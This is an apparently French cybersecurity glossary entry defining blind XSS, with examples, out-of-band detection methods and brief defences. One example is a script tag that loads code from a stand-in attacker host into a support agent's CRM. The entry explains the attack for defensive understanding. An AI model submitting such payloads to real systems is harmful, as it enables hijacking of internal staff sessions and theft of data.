Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 104

XSS Aveugle

Qu'est-ce que XSS Aveugle ?

XSS AveugleVariante de XSS stocké où la charge utile s'exécute dans un contexte que l'attaquant ne voit pas, généralement un back-office ou un panneau interne.


Le XSS aveugle est une sous-catégorie du XSS stocké : le script malveillant ne s'exécute pas dans le navigateur de l'attaquant mais dans un contexte différent, souvent privilégié — vue d'un ticket de support, console anti-fraude, tableau de bord interne ou rapport de sauvegarde. L'attaquant soumet la charge via un formulaire public (contact, inscription, support) et attend qu'un utilisateur interne affiche les données. La détection repose sur des rappels hors bande : la charge exfiltre des informations vers XSS Hunter, Burp Collaborator ou un serveur DNS/HTTP custom, révélant où le script a tourné. Les défenses sont celles du XSS stocké plus une CSP forte sur les outils internes.

Exemples

  1. 01

    Un champ de support contenant <script src=https://x.attaquant/x.js></script> qui s'exécute dans le CRM de l'agent.

  2. 02

    Un en-tête User-Agent journalisé dans un visualiseur d'admin n'encodant pas le HTML.

Questions fréquentes

Qu'est-ce que XSS Aveugle ?

Variante de XSS stocké où la charge utile s'exécute dans un contexte que l'attaquant ne voit pas, généralement un back-office ou un panneau interne. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.

Que signifie XSS Aveugle ?

Variante de XSS stocké où la charge utile s'exécute dans un contexte que l'attaquant ne voit pas, généralement un back-office ou un panneau interne.

Comment fonctionne XSS Aveugle ?

Le XSS aveugle est une sous-catégorie du XSS stocké : le script malveillant ne s'exécute pas dans le navigateur de l'attaquant mais dans un contexte différent, souvent privilégié — vue d'un ticket de support, console anti-fraude, tableau de bord interne ou rapport de sauvegarde. L'attaquant soumet la charge via un formulaire public (contact, inscription, support) et attend qu'un utilisateur interne affiche les données. La détection repose sur des rappels hors bande : la charge exfiltre des informations vers XSS Hunter, Burp Collaborator ou un serveur DNS/HTTP custom, révélant où le script a tourné. Les défenses sont celles du XSS stocké plus une CSP forte sur les outils internes.

Comment se défendre contre XSS Aveugle ?

Les défenses contre XSS Aveugle combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.

Quels sont les autres noms de XSS Aveugle ?

Noms alternatifs courants : XSS hors-bande.

Termes liés